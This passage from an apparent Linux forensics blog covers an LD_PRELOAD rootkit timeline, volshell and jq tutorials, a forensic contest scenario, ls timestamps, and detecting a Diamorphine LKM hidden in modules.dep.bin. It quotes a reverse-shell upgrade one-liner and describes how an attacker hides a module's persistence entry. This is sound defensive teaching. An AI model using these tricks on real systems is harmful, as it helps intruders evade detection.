23:22:19  User "worker" logs in with password from jump host (192.168.4.35) port 48364
23:23:34  User "worker" uses sudo to execute /bin/bash (root shell)
23:23:48  Command-only/scp as user "worker" from jump host (port 55504)
23:24:51  /usr/lib/x86_64-linux-gnu/libymv.so.3 created
23:25:09  /etc/ld.so.preload created (points to .../libymv.so.3)
23:25:19  SSH daemon restarted
23:27:16  User "worker" SSH session from jump host ends (source port 48364)

With everything laid out like this, it becomes obvious that the /etc/ld.so.preload file was created immediately before the SSH daemon was restarted. Since the only person operating on the system at the time was our suspected attacker, it is reasonable to assume that the SSH daemon was restarted so that it would pick up the suspicious libymv.so.3 library.

libymv.so.3 certainly has all the indications of being an LD_PRELOAD type rootkit. Memory analysis is a good path for further investigation, so we will pick up there in our next installment.

Fun With volshell

When triaging a collection of memory images, I often find myself running multiple Volatility plugins on each image. Typically I do this by shell script, calling each plugin individually and saving the output in files. The problem with this approach is that Volatility has to re-parse the memory image each time my script calls a new plugin. This adds a lot of overhead and time. I started wondering if I could leverage volshell to run multiple plugins so that I wouldn’t have to pay the startup cost each time.

volshell Basics

volshell is an interactive shell environment for exploring a memory image. Explaining all the features of volshell would fill a book, so we’re just going to focus on the basics of starting up volshell and running plugins.

Starting volshell is straightforward. Specify a memory image with “-f” and the OS it comes from with “-w“, “-m“, or “-l” (Windows, MacOS, Linux, respectively). If we don’t want the progress meter as it’s ingesting the memory image, we can add “-q” (“quiet” mode).

$ volshell -f avml.lime -l -q
Volshell (Volatility 3 Framework) 2.27.1
Readline imported successfully

Call help() to see available functions

Volshell mode : Linux
Current Layer : layer_name
Current Symbol Table : symbol_table_name1
Current Kernel Name : kernel

(layer_name) >>>

As the startup text suggests, help is available at any time by running the help() function:

(layer_name) >>> help()

Methods:
...
* dpo, display_plugin_output
Displays the output for a particular plugin (with keyword arguments)
...

volshell methods generally have both long and abbreviated forms. For example, we’ll be using the display_plugin_output() method to run plugins. But rather than type that long string each time, we can just use dpo() instead.

For a simple example, let’s run the linux.ip.Addr plugin via volshell:

(layer_name) >>> from volatility3.plugins.linux import ip
(layer_name) >>> dpo(ip.Addr, kernel = self.config['kernel'])

NetNS Index Interface MAC Promiscuous IP Prefix Scope Type State

4026531840 1 lo 00:00:00:00:00:00 False 127.0.0.1 8 host UNKNOWN
4026531840 1 lo 00:00:00:00:00:00 False ::1 128 host UNKNOWN
4026531840 2 enp0s3 08:00:27:3a:05:32 False 192.168.4.22 22 global UP
4026531840 2 enp0s3 08:00:27:3a:05:32 False fdb0:fa27:86c5:1:19cf:7bad:b8a6:c5d7 64 global UP
4026531840 2 enp0s3 08:00:27:3a:05:32 False fdb0:fa27:86c5:1:a00:27ff:fe3a:532 64 global UP
4026531840 2 enp0s3 08:00:27:3a:05:32 False fe80::a00:27ff:fe3a:532 64 link UP
4026532287 1 lo 00:00:00:00:00:00 False 127.0.0.1 8 host UNKNOWN
4026532287 1 lo 00:00:00:00:00:00 False ::1 128 host UNKNOWN
4026532345 1 lo 00:00:00:00:00:00 False 127.0.0.1 8 host UNKNOWN
4026532345 1 lo 00:00:00:00:00:00 False ::1 128 host UNKNOWN
4026532403 1 lo 00:00:00:00:00:00 False 127.0.0.1 8 host UNKNOWN
4026532403 1 lo 00:00:00:00:00:00 False ::1 128 host UNKNOWN
(layer_name) >>>

First we need to import the Volatility class that contains the plugin we want to invoke. The basic syntax here is “from volatility3.plugins.<os> import <class>“. “<os>” will be “windows“, “mac“, or “linux“. Since we’re running a Linux plugin, “<class>” will be the word that appears after “linux.” in the plugin name. For example, if we were trying to run “linux.elfs.Elfs“, then “<class>” is “elfs“.

We use the dpo() method to actually run the plugin and get the output. If we were invoking the plugin on the command line, we would specify “linux.ip.Addr” as the plugin name. But here in Linux volshell, we can leave off the “linux.“. After the plugin name always specify “kernel = self.config['kernel']” to satisfy the dpo() method’s syntax.

If you want to run another plugin, just repeat the pattern. Import the appropriate Volatility class and run dpo() as before:

(layer_name) >>> from volatility3.plugins.linux import pstree
(layer_name) >>> dpo(pstree.PsTree, kernel = self.config['kernel'])

OFFSET (V) PID TID PPID COMM

0x8c7cc0281980 1 1 0 systemd
* 0x8c7cc0d79980 310 310 1 systemd-journal
* 0x8c7cc8268000 357 357 1 systemd-timesyn
* 0x8c7cc81a6600 365 365 1 systemd-udevd
* 0x8c7cc67e0000 687 687 1 avahi-daemon
** 0x8c7cc9986600 718 718 687 avahi-daemon
...

What’s great about this approach is that the memory image was already parsed when volshell started up. So each plugin runs very quickly.

Changing Output Modes

In many cases, it’s better for my workflow to get the plugin output in JSON format rather than the standard text output. I’d be embarrassed to admit how long the following little recipe took me to figure out, so let’s just get to the code:

(layer_name) >>> from volatility3.cli import text_renderer
(layer_name) >>> from volatility3.plugins.linux import psaux
(layer_name) >>> treegrid = gt(psaux.PsAux, kernel = self.config['kernel'])
(layer_name) >>> treegrid.populate()
(layer_name) >>> rt(treegrid,text_renderer.JsonLinesRenderer())

{"ARGS": "/sbin/init", "COMM": "systemd", "PID": 1, "PPID": 0, "__children": []}
{"ARGS": "[kthreadd]", "COMM": "kthreadd", "PID": 2, "PPID": 0, "__children": []}
{"ARGS": "[pool_workqueue_]", "COMM": "pool_workqueue_", "PID": 3, "PPID": 2, "__children": []}
{"ARGS": "[kworker/R-kvfre]", "COMM": "kworker/R-kvfre", "PID": 4, "PPID": 2, "__children": []}
{"ARGS": "[kworker/R-rcu_g]", "COMM": "kworker/R-rcu_g", "PID": 5, "PPID": 2, "__children": []}
...

First we import the text_renderer module from volatility3.cli. This module contains renderers for outputting various text formats, like JsonLinesRenderer() for single-line JSON. Other options include JsonRenderer() for “pretty-printed” JSON output, or CSVRenderer() for comma-separated values formatting.

Next we import the class for the Volatility plugin we want to invoke, just as before. But rather than calling dpo(), we create a new treegrid object with generate_treegrid() (abbreviated “gt()“). The arguments to gt() are the same as those for dpo().

gt() merely creates the treegrid object. We still have to call the treegrid.populate() method to load data into the object. Once we have populated the treegrid with data, we can invoke render_treegrid() (“rt()“) to output the data with our chosen text renderer.

Stumbling Towards Automation

Clearly this approach requires a lot of redundant typing. Automating the task of running multiple plugins through volshell is clearly the next step. My ptt.sh script has an initial attempt at this. At some point, I’d like to turn this idea into a standalone script outside of ptt.sh.
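One crude stopgap, assuming volshell will consume commands from standard input like any other Python interactive console (treat this as a sketch, not a polished tool):

$ cat runplugins.py
from volatility3.plugins.linux import pstree, psaux
dpo(pstree.PsTree, kernel = self.config['kernel'])
dpo(psaux.PsAux, kernel = self.config['kernel'])
$ volshell -f avml.lime -l -q < runplugins.py

The image only gets parsed once at startup, and then both plugins run back to back.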

jq For Forensics

jq is a tremendously useful tool for dealing with JSON data. But the documentation that exists seems to be targeted at developers parsing deeply nested JSON structures to transform them into other JSON structures. In my DFIR role, I typically deal with streams of fairly simple JSON records–usually some sort of log– that I need to transform into structured text, such as comma-separated (CSV) or tab-separated (TSV) output. I’ve spent a lot of time running through reference manuals and endless Stack Overflow postings to get to a reasonable level with jq. I wanted to share some of the things I’ve learned along the way.

Start With The Basics

At its simplest, jq is an excellent JSON pretty printer:

$ jq . journal.json
{
"_MACHINE_ID": "0f2f13b9dce0451591ae0dc418f6c96f",
"_RUNTIME_SCOPE": "system",
"_HOSTNAME": "vbox",
"_SOURCE_BOOTTIME_TIMESTAMP": "0",
"MESSAGE": "Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)",
"__MONOTONIC_TIMESTAMP": "6400064",
"_SOURCE_MONOTONIC_TIMESTAMP": "0",
"_BOOT_ID": "2a5a598d4f6142c7b7719eed38c1a2b9",
"SYSLOG_IDENTIFIER": "kernel",
"_TRANSPORT": "kernel",
"PRIORITY": "5",
"SYSLOG_FACILITY": "0",
"__CURSOR": "s=0a047604dca842218e0807bc796d4cb7;i=1;b=2a5a598d4f6142c7b7719eed
38c1a2b9;m=61a840;t=64dc728142e95;x=852824913ddff90e",
"__REALTIME_TIMESTAMP": "1774367626505877"
}
{
"_MACHINE_ID": "0f2f13b9dce0451591ae0dc418f6c96f",
"MESSAGE": "Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet",

...

The basic syntax here is “jq <script> <jsonfile> ...“, where <script> is some sort of translation script in jq‘s own particular scripting language. The script “.” is essentially a null transformation that simply tells jq to output whatever it sees in its input <jsonfile>. The default output style for jq is the pretty-printed style you see above.

Some of you will recognize the data above as Systemd journal entries. Normally we would work with the Systemd journal via the journalctl command. But exported journal data from one of my lab systems is a good example set for showing you some useful jq tips and tricks that you can apply to any sort of exported logging stream.

Other Output Modes

Suppose we just wanted to output the “MESSAGE” field from each record. Just specify the field you want to output with a leading “.“:

$ jq .MESSAGE journal.json
"Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)"
"Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet"
...

Because the value of the MESSAGE field is a string, jq outputs each message surrounded by double quotes. If you don’t want the quoting, use the “-r” option for raw mode output:

$ jq -r .MESSAGE journal.json
Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)
Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet
...

Suppose we wanted to output multiple fields as columns of structured text. jq includes support for both “@csv” and “@tsv” output modes:

$ jq -r '[.__REALTIME_TIMESTAMP, ._HOSTNAME, .MESSAGE] | @csv' journal.json
"1774367626505877","vbox","Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)"
"1774367626505925","vbox","Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet"
...

jq transformation scripts use a pipelining syntax. Here we’re sending the fields we want to output into the “@csv” formatting tool. “@csv” wants its inputs as a JSON array, so we create an array on the fly simply by enclosing the fields we want to output with square brackets (“[..., ..., ...]“). The “@csv” output method automatically quotes each field and handles escaping any double quotes that might be included.
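The “@tsv” variant works the same way, just with tab delimiters and without the quoting:

$ jq -r '[.__REALTIME_TIMESTAMP, ._HOSTNAME, .MESSAGE] | @tsv' journal.json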

If you want other delimiters besides the traditional commas or tabs, jq can also output arbitrary text:

$ jq -r '"\(.__REALTIME_TIMESTAMP)|\(._HOSTNAME)|\(.MESSAGE)"' journal.json
1774367626505877|vbox|Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)
1774367626505925|vbox|Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet
...

Use double quotes ("...") to enclose your output template. Use “\(.fieldname)” to output the value of specific fields. Anything else in your template is output as literal text. Here I’m outputting pipe-delimited text with the same three fields as in our CSV example above.

Note that our output template can use the typical escape sequences like “\t” for tabs. So another way to produce tab-delimited text would be:

$ jq -r '"\(.__REALTIME_TIMESTAMP)\t\(._HOSTNAME)\t\(.MESSAGE)"' journal.json
1774367626505877 vbox Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)
1774367626505925 vbox Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet
...

However, it’s almost certainly easier to use '[..., ..., ...] | @tsv' for this.

Transforming Data With Builtin Operators

jq includes a wide variety of builtin operators for data transformation and math. For example, suppose we wanted to format those __REALTIME_TIMESTAMP fields in the Systemd journal into human-readable strings:

$ head -1 journal.json | jq -r '(.__REALTIME_TIMESTAMP | tonumber) / 1000000 | strftime("%F %T")'
2026-03-24 15:53:46

There’s a lot going on here, so let’s break it down a bit at a time. __REALTIME_TIMESTAMP is a string– if you look at the pretty-printed output above, the values are displayed in double quotes meaning they are string type values. Ultimately we want to feed the __REALTIME_TIMESTAMP value into strftime() to produce formatted text, but strftime() wants numeric input. The first thing to do then is to convert the string into a number with “tonumber“. The jq piping syntax is how we express this transformation.

Our next problem is that __REALTIME_TIMESTAMP is in microseconds, but strftime() wants good old Unix epoch seconds. So we do some math with the traditional “/” operator for division. This actually converts our value into a decimal number (“1774367626.505877“), but that’s good enough for strftime(). Finally we pipeline the number we calculated into the strftime() function. We give strftime() an appropriate format string to get the output we want.

This works great, but we’re throwing away the microseconds information. What if we wanted to display that as part of the timestamp? Time to introduce some more useful string operations:

$ head -1 journal.json | jq -r '((.__REALTIME_TIMESTAMP | tonumber) / 1000000 | strftime("%F %T.")) + 
(.__REALTIME_TIMESTAMP | .[-6:])'

2026-03-24 15:53:46.505877

Looking at the back part of our expression on the second line above, we are using jq‘s slicing operation “.[start:end]“. Since we are using a negative offset for the start value, we are counting backwards six characters from the end of the string. With no end value specified, the slice runs from that point to the end of the string.
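You can test the slicing behavior in isolation:

$ echo '"1774367626505877"' | jq -r '.[-6:]'
505877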

Like many other scripting languages, jq supports string concatenation with the addition operator (“+“). Here we are adding the formatted string output from strftime() and the microseconds value we sliced out of the string. Note that the strftime() format has been updated to output a literal “.” between the formatted time and the microseconds.

Suppose we wanted to include the human-readable timestamp we just created instead of the raw epoch microseconds for our “@csv” output. The trick is to take our jq code for producing human readable timestamps and drop it into our “[...] | @csv” pipeline in place of the __REALTIME_TIMESTAMP field:

$ jq -r '[((.__REALTIME_TIMESTAMP | tonumber) / 1000000 | strftime("%F %T.")) + (.__REALTIME_TIMESTAMP | .[-6:]), ._HOSTNAME, .MESSAGE] | @csv' journal.json
"2026-03-24 15:53:46.505877","vbox","Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)"
"2026-03-24 15:53:46.505925","vbox","Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet"
...

Scripting With jq

Obviously that jq expression is pretty horrible to type on the command line. You can always take any jq script and put it into a text file and then run that script on your data with the “-f” option:

$ jq -r -f csv-journal.jq journal.json
"2026-03-24 15:53:46.505877","vbox","Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)"
"2026-03-24 15:53:46.505925","vbox","Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet"
...

In this instance, our csv-journal.jq file is the jq recipe from our command line example, but without the single quotes. Since jq doesn’t care about whitespace in scripts, we can format our recipe with newlines and indentation to make it more readable:

$ cat csv-journal.jq 
[((.__REALTIME_TIMESTAMP | tonumber) / 1000000 | strftime("%F %T.")) +
(.__REALTIME_TIMESTAMP | .[-6:]),
._HOSTNAME, .MESSAGE] | @csv

On Linux systems you can even use jq in a “bang path” (shebang line) at the top of the script so it automatically gets invoked as the interpreter:

$ cat csv-journal.jq
#!/usr/bin/jq -rf

[((.__REALTIME_TIMESTAMP | tonumber) / 1000000 | strftime("%F %T.")) +
(.__REALTIME_TIMESTAMP | .[-6:]),
._HOSTNAME, .MESSAGE] | @csv

Note that the new interpreter path at the top of the script includes the “-rf” options for raw output (“-r“) and interpreting the rest of the file as a script (“-f“).

Once we have the interpreter path at the top of the script, we can just cat our JSON data into the script without invoking jq directly:

$ chmod +x csv-journal.jq 
$ cat journal.json | ./csv-journal.jq
"2026-03-24 15:53:46.505877","vbox","Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)"
"2026-03-24 15:53:46.505925","vbox","Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet"
...

This might make things easier for less-technical users.

Selecting Records

When working with streams of records, it’s typical to want to only operate on certain records. For example, suppose we only wanted to see log messages from the “sudo” command. In the Systemd journal, these messages have the “SYSLOG_IDENTIFIER” field set to “sudo“:

$ jq -r 'select(.SYSLOG_IDENTIFIER == "sudo") | .MESSAGE' journal.json
worker : user NOT in sudoers ; TTY=pts/0 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
worker : TTY=pts/2 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
pam_unix(sudo:session): session opened for user root(uid=0) by worker(uid=1000)
pam_unix(sudo:session): session closed for user root
worker : TTY=pts/0 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
pam_unix(sudo:session): session opened for user root(uid=0) by worker(uid=1000)
pam_unix(sudo:session): session closed for user root
worker : TTY=pts/1 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
pam_unix(sudo:session): session opened for user root(uid=0) by worker(uid=1000)
worker : TTY=pts/3 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
...

The new magic is jq‘s select() operator up at the front of that pipeline. If the conditional you give to select() evaluates to true, then the record you have matched gets passed down for processing by the rest of the pipeline. If not, then that record is skipped.

Logical operators (“and“, “or“, “not“) and parentheses are allowed. And you can do pattern matching with PCRE-like expressions. For example, the really interesting lines in Sudo logs are the ones that show the command being invoked (“COMMAND=“):

$ jq -r 'select(.SYSLOG_IDENTIFIER == "sudo" and (.MESSAGE | test("COMMAND="))) | .MESSAGE' journal.json
worker : user NOT in sudoers ; TTY=pts/0 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
worker : TTY=pts/2 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
worker : TTY=pts/0 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
worker : TTY=pts/1 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
worker : TTY=pts/3 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
...

For pattern matching, just pipeline the field you want to match against into the test() operator. Here I’m matching the literal string “COMMAND=” against the MESSAGE field. The pattern match is joined with our original selector for “sudo” in the SYSLOG_IDENTIFIER field using a logical “and“.

Here’s another example showing a useful regex when dealing with SSH logs, just to give you a flavor of things you can do with regular expression matching:

$ jq -r 'select(._COMM == "sshd" and 
(.MESSAGE | test("^((Accepted|Failed) .* for|Invalid user) "))) | .MESSAGE' journal.json

Invalid user mary from 192.168.10.31 port 55746
Failed password for invalid user mary from 192.168.10.31 port 55746 ssh2
Accepted password for hal from 192.168.4.22 port 42310 ssh2
...

Enough For Now

Hopefully this is enough to get you started writing your own basic jq scripts. As with many things, the rest you pick up as you practice and get frustrated. The jq reference manual is useful for checking the syntax of different built-in operators, but I often find the examples more frustrating than helpful. Searching Stack Overflow can often yield more useful results.

Feel free to drop your questions into the comments, or reach out to me via social media or email. Maybe your questions will turn this single blog article into a series!

Linux Forensic Scenario

Let’s try something a little different for today’s blog post!

I’ve been working on ideas for a major update on my Linux forensics class, including new lab scenarios. I recently threw together a rough draft of one of my scenario ideas: built a machine, planted some malware on it, and then used UAC to capture forensic data from the system. I was pleased with the results, and thought I would share them with the larger community.

And then I thought, why not turn it into a bit of a contest? For the moment I haven’t decided on any prizes other than bragging rights, but you never know. I have decided that the deadline for submissions for judging will be April 15th– tax day here in the USA.

The Scenario

You received an escalation from your SOC. They received an alert from their NMS about suspicious traffic to one of the Linux workers in the development group’s CI/CD pipeline. The alert was for unencrypted traffic on port 22/tcp, specifically the string “python3 -c 'import pty; pty.spawn("/bin/bash")'” which triggered the alert for “reverse shell promotion” in the NMS. They note that the system is showing signs of heavy CPU usage but that they don’t see any process(es) that account for this. Following their SOP, they acquired data from the system using UAC and have escalated to you as on-call for the internal IR/Threat team.

Other information about the system:

  • There is a single shared account on the system called “worker“. It has full Sudo privileges with the NOPASSWD option set.
  • All network access to the box is through a jump host at IP 192.168.4.35.
  • The UAC collection is uac-vbox-linux-20260324234043.tar.gz

Additional Comments

I threw this scenario together in a matter of hours, so when you look at the timeline of the system you will see that it got built and then compromised very quickly. For the final scenario I will doubtless do a more complete job running fake workloads for some time before the “attack” actually happens.

Similarly, you’ll probably discover that there is no significant network infrastructure around the compromised system. The “jump host” is really just another host in my lab environment that I was operating from.

But I still think there’s plenty of interesting artifacts to find in this scenario. I’m leaving things deliberately open-ended because I want to see what people come up with. But the goal would be to at least account for the issues raised by the SOC: why is there unencrypted traffic on 22/tcp, why is the system burning CPU, and why can’t the SOC see what is going on? Is the system compromised? When and how did that happen?

Submissions

Submissions for judging must be received no later than 23:59 UTC on 2026-04-15. I will accept submissions in .docx, PDF, or text. You may email your submissions to hrpomeranz@gmail.com. Please try to put something like “Linux Forensic Scenario Submission” in the Subject: line to make my life easier.

Depending on the number of submissions I get, I may need more folks to help with the judging. If you’re not planning to compete but would like to help judge, please drop me a line at the email address above. I’ll let you know if I need the help once I count the number (and length) of the submissions.

Happy forensicating! Have fun!

Linux Notes: ls and Timestamps

There’s an old riddle in Unix circles: “Name a letter that is not an option for the ls command”. The advent of the GNU version of ls has only made this more difficult to answer. Even if you’re a Unix/Linux power user, you’ve probably only memorized a small handful of the available options.

For example, I have “ls -lArt” burned into my brain from my Sys Admin days. “-l” for detailed listing, “-A” to show hidden files and directories (but not the “.” and “..” links like “-a”), sort by last modified time with “-t”, and “-r” to reverse the sort so the newest files appear right above your next shell prompt.

$ ls -lArt
total 1288
-rw-r--r-- 1 root root 9 Aug 7 2006 host.conf
-rw-r--r-- 1 root root 433 Aug 23 2020 apg.conf
-rw-r--r-- 1 root root 26 Dec 20 2020 libao.conf
-rw-r--r-- 1 root root 12813 Mar 27 2021 services
-rw-r--r-- 1 root root 769 Apr 10 2021 profile
-rw-r--r-- 1 root root 449 Nov 29 2021 mailcap.order
-rw-r--r-- 1 root root 119 Jan 10 2022 catdocrc
...
-rw-r--r-- 1 root root 52536 Feb 23 11:44 mailcap
-rw-r--r-- 1 root root 108979 Mar 2 09:24 ld.so.cache
-rw-r--r-- 1 root root 75 Mar 3 18:08 resolv.conf
drwxr-xr-x 5 root lp 4096 Mar 5 19:52 cups

You’ll note that the timestamps are displayed in two different formats. The oldest files show “month day year”, while the newer files show “month day hh:mm”. By default, GNU ls switches to the year format when a file’s modification time is more than six months in the past.

Personally I prefer consistent ISO-style timestamps with “--time-style=long-iso”:

$ ls -lArt --time-style=long-iso
total 1288
-rw-r--r-- 1 root root 9 2006-08-07 13:14 host.conf
-rw-r--r-- 1 root root 433 2020-08-23 10:52 apg.conf
-rw-r--r-- 1 root root 26 2020-12-20 11:21 libao.conf
-rw-r--r-- 1 root root 12813 2021-03-27 18:32 services
-rw-r--r-- 1 root root 769 2021-04-10 16:00 profile
-rw-r--r-- 1 root root 449 2021-11-29 08:07 mailcap.order
-rw-r--r-- 1 root root 119 2022-01-10 19:08 catdocrc
...
-rw-r--r-- 1 root root 52536 2026-02-23 11:44 mailcap
-rw-r--r-- 1 root root 108979 2026-03-02 09:24 ld.so.cache
-rw-r--r-- 1 root root 75 2026-03-03 18:08 resolv.conf
drwxr-xr-x 5 root lp 4096 2026-03-05 19:52 cups

While “-t” sorts on last modified time by default, other options allow you to sort and display other timestamps. For example, “-u” sorts on and displays last access time. “-u” is hardly memorable as last access time, but remember “-a” is used for something else.

It’s a pain trying to remember the one-letter options for the other timestamps– and note there isn’t even a short option for sorting/displaying on file creation time. So I just use “--time=” to pick the timestamp I want:

$ ls -lArt --time=birth --time-style=long-iso
total 1288
-rw-r--r-- 1 root root 1013 2025-04-10 10:27 fstab
drwxr-xr-x 2 root root 4096 2025-04-10 10:27 ImageMagick-6
drwxr-xr-x 2 root root 4096 2025-04-10 10:27 GNUstep
...
-rw-r--r-- 1 root root 142 2026-02-23 11:41 shells
-rw-r--r-- 1 root root 52536 2026-02-23 11:44 mailcap
-rw-r--r-- 1 root root 108979 2026-03-02 09:24 ld.so.cache
-rw-r--r-- 1 root root 75 2026-03-03 18:08 resolv.conf

Here we’re sorting on and displaying file creation times (“--time=birth”). You can use “--time=atime” (equivalent to “-u”) or “--time=ctime” for the other timestamps.
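
And if you just want to see every timestamp for one file at once, GNU stat will print all four (birth time shows as “-” on file systems that don’t record it). The format string here is just one possibility:

$ stat --printf 'atime: %x\nmtime: %y\nctime: %z\nbirth: %w\n' /etc/resolv.conf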

If this command line seems long and unwieldy, remember that you can create aliases for commands in your .bashrc or other startup files:

alias ls='ls --color=auto --time-style=long-iso'
alias lb='ls -lArt --time=birth'

With normal ls commands I’ll always get colored output, and “long-iso” dates whenever I use “-l”. I can use lb whenever I want file creation times. Note that alias definitions “stack”– the “lb” alias will get the color and time-style options from my basic “ls” alias, so I don’t need to include the “--time-style” option in the “lb” alias.
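
You can check what an alias will expand to using the shell’s type builtin:

$ type lb
lb is aliased to `ls -lArt --time=birth'

Note that type only shows one level of expansion; bash re-expands the leading “ls” through your other alias when the command actually runs.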

A Little More on LKM Persistence

In my previous blog post I demonstrated a method for persisting a Linux LKM rootkit across reboots by leveraging systemd-modules-load. For this method to work, we needed to add the evil module into the /usr/lib/modules/$(uname -r) directory and then run depmod. As I pointed out in the article, while the LKM could hide the module object itself, the modprobe command invoked by systemd-modules-load requires the module name to be listed in the modules.dep and modules.dep.bin files created by depmod.

But a few days later it occurred to me that the module name actually only has to appear in the modules.dep.bin file for the module to be loaded. modules.dep is an intermediate file that modules.dep.bin is built from. The modprobe command invoked by systemd-modules-load only looks at the (trie-structured) modules.dep.bin file. So once modules.dep.bin is created, the attacker could go back and remove their evil module name from modules.dep.

I tested this on my lab system, installing the LKM per my previous blog post and then editing the evil module name out of modules.dep. When I rebooted my lab system, I verified that the evil module was loaded by looking for the files that are hidden by the rootkit:

# ls /usr/lib/modules-load.d/
fwupd-msr.conf open-vm-tools-desktop.conf
# ls /usr/lib/modules/$(uname -r)/kernel/drivers/block
aoe drbd loop.ko nbd.ko pktcdvd.ko rsxx sx8.ko virtio_blk.ko xen-blkfront.ko
brd.ko floppy.ko mtip32xx null_blk.ko rbd.ko skd.ko umem.ko xen-blkback zram

If the rootkit were not operating, we’d see a zaq123edcx* file in each of these directories.

I thought about writing some code to unpack the format of modules.dep.bin. This format is well documented in the comments of the source code for depmod.c. But then I realized that there was a much easier way to find the evil module name hiding in modules.dep.bin.

depmod works by walking the directory structure under /usr/lib/modules/$(uname -r) and creating modules.dep based on what it finds there. If we run depmod while the LKM is active, then depmod will not see the evil kernel object and will build new modules.dep and modules.dep.bin files without the LKM object listed:

# cd /usr/lib/modules/$(uname -r)
# cp modules.dep modules.dep.orig
# cp modules.dep.bin modules.dep.bin.orig
# depmod
# diff modules.dep modules.dep.orig
# diff modules.dep.bin modules.dep.bin.orig
Binary files modules.dep.bin and modules.dep.bin.orig differ

The old and new modules.dep files are the same, since I had previously removed the evil module name by hand. But the *.bin* files differ because the evil module name is still lurking in modules.dep.bin.orig.

And I don’t need to write code to dump the contents of modules.dep.bin.orig— I’ll just use strings and diff:

# diff <(strings -a modules.dep.bin.orig) <(strings -a modules.dep.bin)
1c1
< ?=4_cs
---
> 4_cs
5610,5611d5609
< 123edcx_diamorphine
< <kernel/drivers/block/zaq123edcx-diamorphine.ko:
5616c5614
< 4ndemod
---
> demod
5619c5617
< enhua
---
> 5jenhua
5622a5621
> 7@53
5627d5625
< 8Z2c
5630c5628
< a2326
---
> 9Ja2326
5635c5633
< alloc
---
> <valloc

The output would be prettier with some custom tooling, but you can clearly see the name of the hidden object in the diff output.

From an investigative perspective, I really wish depmod had an option to write modules.dep.bin to an alternate directory. That would make it easier to perform these steps without modifying the state of the system under investigation. I suppose we could use overlayfs hacks to make this happen.
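
Something along these lines ought to work. depmod’s “-b” option sets an alternate base directory, but it both reads modules from and writes the modules.dep* files to that directory. If we point “-b” at an overlay mount, the reads fall through to the real module tree while the writes land in a scratch “upper” directory. A sketch (the mount points are illustrative; upperdir and workdir must be empty directories on the same file system):

# mkdir -p /mnt/alt/lib/modules /mnt/upper /mnt/work
# mount -t overlay overlay \
    -o lowerdir=/usr/lib/modules,upperdir=/mnt/upper,workdir=/mnt/work \
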